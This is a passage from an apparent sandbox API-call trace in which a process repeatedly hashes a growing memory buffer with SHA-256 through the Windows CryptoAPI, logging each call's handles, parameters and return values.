	[0253.106] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c45e0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c45e0, pdwDataLen=0x128c3c) returned 1
	[0253.106] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.106] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.106] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.106] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.106] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0253.106] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.106] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4608
	[0253.106] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4608, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4608, pdwDataLen=0x128c3c) returned 1
	[0253.106] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.106] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.106] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.106] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.106] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0253.107] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.107] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4630
	[0253.107] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4630, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4630, pdwDataLen=0x128c3c) returned 1
	[0253.107] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.107] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.107] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.107] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.107] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0253.107] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.107] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4658
	[0253.107] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4658, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4658, pdwDataLen=0x128c3c) returned 1
	[0253.107] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.107] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.107] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.107] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.107] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0253.107] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.108] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4680
	[0253.108] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4680, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4680, pdwDataLen=0x128c3c) returned 1
	[0253.108] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.108] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.108] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.108] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.108] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0253.108] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.108] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c46a8
	[0253.108] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c46a8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c46a8, pdwDataLen=0x128c3c) returned 1
	[0253.108] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.108] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.108] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.108] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.108] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0253.108] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.108] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c46d0
	[0253.109] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c46d0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c46d0, pdwDataLen=0x128c3c) returned 1
	[0253.109] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.109] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.109] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.109] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.109] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0253.109] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.109] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c46f8
	[0253.109] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c46f8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c46f8, pdwDataLen=0x128c3c) returned 1
	[0253.109] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.109] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.109] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.109] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.109] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0253.109] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.109] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4720
	[0253.110] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4720, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4720, pdwDataLen=0x128c3c) returned 1
	[0253.110] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.110] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.110] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.110] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.110] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0253.110] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.110] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4748
	[0253.110] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4748, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4748, pdwDataLen=0x128c3c) returned 1
	[0253.110] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.110] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.110] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.111] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.111] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0253.111] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.111] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4770
	[0253.111] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4770, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4770, pdwDataLen=0x128c3c) returned 1
	[0253.111] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.111] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.111] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.111] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.111] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0253.111] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.111] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4798
	[0253.111] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4798, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4798, pdwDataLen=0x128c3c) returned 1
	[0253.111] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.111] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.111] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.112] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.112] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0253.112] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.112] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c47c0
	[0253.112] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c47c0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c47c0, pdwDataLen=0x128c3c) returned 1
	[0253.112] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.112] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.112] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.112] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.112] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0253.112] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.112] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c47e8
	[0253.112] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c47e8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c47e8, pdwDataLen=0x128c3c) returned 1
	[0253.112] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.112] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.112] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.113] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.113] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0253.113] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4810
	[0253.113] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4810, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4810, pdwDataLen=0x128c3c) returned 1
	[0253.113] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.113] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.113] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.113] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.113] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0253.113] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4838
	[0253.113] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4838, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4838, pdwDataLen=0x128c3c) returned 1
	[0253.113] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.113] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.114] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.114] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.114] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0253.114] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4860
	[0253.114] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4860, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4860, pdwDataLen=0x128c3c) returned 1
	[0253.114] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.114] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.114] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.114] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.114] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0253.114] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4888
	[0253.114] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4888, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4888, pdwDataLen=0x128c3c) returned 1
	[0253.114] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.115] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.115] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.115] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.115] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0253.115] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.115] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c48b0
	[0253.115] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c48b0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c48b0, pdwDataLen=0x128c3c) returned 1
	[0253.115] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.115] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.115] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.115] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.115] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0253.115] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.115] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c48d8
	[0253.115] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c48d8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c48d8, pdwDataLen=0x128c3c) returned 1
	[0253.115] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.116] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.116] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.116] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.116] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0253.116] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.116] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4900
	[0253.116] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4900, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4900, pdwDataLen=0x128c3c) returned 1
	[0253.116] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.116] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.116] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.116] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.116] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0253.116] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.116] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4928
	[0253.116] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4928, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4928, pdwDataLen=0x128c3c) returned 1
	[0253.116] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.117] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.117] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.117] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.117] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0253.117] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.117] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4950
	[0253.117] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4950, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4950, pdwDataLen=0x128c3c) returned 1
	[0253.117] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.117] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.117] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.117] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.117] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0253.117] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.117] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4978
	[0253.117] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4978, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4978, pdwDataLen=0x128c3c) returned 1
	[0253.117] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.118] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.118] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.118] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.118] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0253.118] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.118] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c49a0
	[0253.118] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c49a0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c49a0, pdwDataLen=0x128c3c) returned 1
	[0253.118] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.118] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.118] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.118] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.118] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0253.118] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.118] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c49c8
